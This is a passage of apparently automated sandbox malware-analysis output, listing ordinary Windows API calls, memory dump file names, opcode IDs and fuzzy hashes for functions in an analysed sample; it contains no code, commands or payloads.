                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00EDF783
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: EnvironmentVariable
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1431749950-0
                                                                                                                                                                                                                                      • Opcode ID: c9f4e59a68029ac6aa9f6e30e78d4e26ab3f9fe2c23ca3b729714bf7ddc82b6b
                                                                                                                                                                                                                                      • Instruction ID: 8c5834bfba5359fac52735813ff9b444c6b94ee931784f71e4ee1ad5376785d0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c9f4e59a68029ac6aa9f6e30e78d4e26ab3f9fe2c23ca3b729714bf7ddc82b6b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 54F08C72610208BFCB04EFA5DC4AE9F7BE8EF85724F004465F509BB261EA70AE45C760
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RtlAllocateHeap.FWRHGLUIBB(00000008,?,00000000,?,00E930A9,00000001,00000364,?,00E80075,?,?,00ED0FE4,0000FFFF), ref: 00E94F3E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                                                                      • Opcode ID: 8df468ef4529cd9d57b02d9143b86ed041eff60a8a989931aca20c28b0969ae9
                                                                                                                                                                                                                                      • Instruction ID: ea99d5b54f0f703af590f3efe2687567b9115d0c532aa9faa8706a0cf491b4b9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8df468ef4529cd9d57b02d9143b86ed041eff60a8a989931aca20c28b0969ae9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CFF0B4B2B055276ADF216F629C05F9A3798EB907B0B147151BC1DF71D0CE20DC0286E0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(00000000,?,00000000,00000000,00000000,?,00E66FE8,?,00000047,00000000,00000000,?), ref: 00E7EAE3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: BuffCharUpper
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3964851224-0
                                                                                                                                                                                                                                      • Opcode ID: d0d818b77742cdd47ba2cd918bd9abcc24895e684a02d69a00edc1405bfaca08
                                                                                                                                                                                                                                      • Instruction ID: 9b8243317ff06488470c372422a8508ff1e8b6c23978341a8158c123eaadc46f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d0d818b77742cdd47ba2cd918bd9abcc24895e684a02d69a00edc1405bfaca08
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6CF0BE75200625EBCB256F15E904B29FBE5FF58B61F00912AF00EA6681CBB1E820CBC4
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RtlAllocateHeap.FWRHGLUIBB(00000000,?,?,?,00E80075,?,?,00ED0FE4,0000FFFF), ref: 00E93AD2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                                                                      • Opcode ID: 371b9e00aaec30e48a61ecbaa5dd5dccd4e389c65ff9225d0317bca2794b03c4
                                                                                                                                                                                                                                      • Instruction ID: e1a45b15ac07efbd9a6e5ecdfda3d9598e7d94cd3615979fb924d95c0b2488b4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 371b9e00aaec30e48a61ecbaa5dd5dccd4e389c65ff9225d0317bca2794b03c4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2DE065312056255ADF213BB79C04F9A7A99DB417B5F1A2121BC9DB6090DF94CD0182E0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 2c29a787450b2dfa3cc8318dece11c47f3d32c55b89ed4c8022b25aa27fd301c
                                                                                                                                                                                                                                      • Instruction ID: e547648da420942c47010feb878ab3fd09ad7c6467de9df5dfac961545e38ee7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c29a787450b2dfa3cc8318dece11c47f3d32c55b89ed4c8022b25aa27fd301c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E0F0A0B1241B01CFC7389F74E480856BBE1AF083A9314993EE1DAA2610C771A840DF00
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClearVariant
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1473721057-0
                                                                                                                                                                                                                                      • Opcode ID: ca1a042cdc79471ce7ed706c216b298b6cea3683d593962523431c1cff35b7d1
                                                                                                                                                                                                                                      • Instruction ID: bd2090bd9cb49d414740c6769fcdc73167ebeee0a06e42d8cde2d9301a8d8773
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ca1a042cdc79471ce7ed706c216b298b6cea3683d593962523431c1cff35b7d1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6BF05572608B448EE7205A65A8047E6FBD4AB00328F04A50BD4CEE1082C3B104889B92
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00E6286C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: IconNotifyShell_
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1144537725-0
                                                                                                                                                                                                                                      • Opcode ID: 553f749325f24036bc70b9461e0f19f911227babf0d54e788a742d0104dd3688
                                                                                                                                                                                                                                      • Instruction ID: badcaaeb32ff933a3c3fdbbae460fa45a7ff2c34c4a479b7220c3fe30ddf29ce
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 553f749325f24036bc70b9461e0f19f911227babf0d54e788a742d0104dd3688
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8FF037709143189FEB92DF24EC467957BFCA70170CF0000A9A648A7195D7745788CF51
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00E62AAB
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LongNamePath
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 82841172-0
                                                                                                                                                                                                                                      • Opcode ID: fbaa4bab444d77bc105bc3d169a19426e56f2bad5f71b8f0fdf3e52a59866afa
                                                                                                                                                                                                                                      • Instruction ID: 1a0bdd6771c23f48a3cf6bacc8cca80e8fa94b40b8e6068f5ef2160f04b4891b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fbaa4bab444d77bc105bc3d169a19426e56f2bad5f71b8f0fdf3e52a59866afa
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D5E0C272A042285BCB20A25C9C0AFEA77EDDFC87D0F0400B5FD49F7258D960ED80D690
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E62874: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E62945
                                                                                                                                                                                                                                        • Part of subcall function 00E6DCA0: GetInputState.USER32 ref: 00E6DD77
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00E623D5
                                                                                                                                                                                                                                        • Part of subcall function 00E62810: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00E6286C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3667716007-0
                                                                                                                                                                                                                                      • Opcode ID: 55248d3618f1f607ce9f3fddd9986d6d78590b38580b0ac41bf92f0a626f625d
                                                                                                                                                                                                                                      • Instruction ID: 51a1f00157799d5a03ab829abf61d70c6b88e9d446a530126b6b14bc7e2b3a05
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 55248d3618f1f607ce9f3fddd9986d6d78590b38580b0ac41bf92f0a626f625d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A7E0866178414906CA0CBB75BC5556EB7D58BD03A8F41793EF242A31A3DE2448999351
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000710DC,00000000,00000000,?), ref: 00ED1111
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                                                                                      • Opcode ID: 2d48993d112fc2624062b781f71dcdfa3f7461687172e27ee69db84509fc838e
                                                                                                                                                                                                                                      • Instruction ID: 6bbf9916181d0e0d978f8cd8641c8697708fca5d6887f2f86fd0c97a2c5157a0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d48993d112fc2624062b781f71dcdfa3f7461687172e27ee69db84509fc838e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C6D05EB2426314BF9B2C9B51DE0ACA77A9CEA01614340216FB802E2A40F5A0FD40CAA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindCloseChangeNotification.KERNEL32(?,?,00000000,00EA29D0), ref: 00E668AB
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2591292051-0
                                                                                                                                                                                                                                      • Opcode ID: 1a930df89be9a25937dc4a3e028aa6177d698579cef449e1d922241948eb9bf5
                                                                                                                                                                                                                                      • Instruction ID: 151e7d15b5403faca7e31aa54d76d40a57fde0d580c291e7d7fe2d457d024c4f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a930df89be9a25937dc4a3e028aa6177d698579cef449e1d922241948eb9bf5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5DE09275450B01CEC7354F2AE804452FAE4FFD13A23244A2ED4E592660D7B0688ADB51
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00ECD8D2,?,?), ref: 00ECD968
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CopyFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1304948518-0
                                                                                                                                                                                                                                      • Opcode ID: f23d43c86e1d58eb056bae07014a5a62a015508887e40dff04b38b49d722850c
                                                                                                                                                                                                                                      • Instruction ID: 25c8aea327b94f290e71784c53331a5ed520f9b18868f9a9de83422810d30a5d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f23d43c86e1d58eb056bae07014a5a62a015508887e40dff04b38b49d722850c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B8D0A7305D0208BBFF108B51CC03F9DB76CE701B45F204194B101EA0E0C7B5A5089764
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,00000000,?,00EA0985,?,?,00000000,?,00EA0985,00000000,0000000C), ref: 00EA0638
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                                                      • Opcode ID: b82e628e995d0c50f751419fbf629bbf71319e69823da0a71be378249b5fcfc5
                                                                                                                                                                                                                                      • Instruction ID: ebc34340071dee5f20fa035311f3077cae83bc81fa88ecea4c74eb6d74fefa74
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b82e628e995d0c50f751419fbf629bbf71319e69823da0a71be378249b5fcfc5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 46D06C3200010DBFDF028F85DD06EDA3FAAFB88714F014000BE5866020C732E831EB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,00ECD64B), ref: 00ECE8BC
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                                      • Opcode ID: d41513b5466730ce33dbbe66641ab823978b3ece2e01a14aae6b346b68329113
                                                                                                                                                                                                                                      • Instruction ID: 68bc16baad339ee93141446b5fdeb176be45fe23a4e2a753982fa9839e2f473c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d41513b5466730ce33dbbe66641ab823978b3ece2e01a14aae6b346b68329113
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2BB0922500060009AD2C0B381B0EAB9370169837A9BEC3B88F479A52F5933A8C0FE661
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00E62291
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
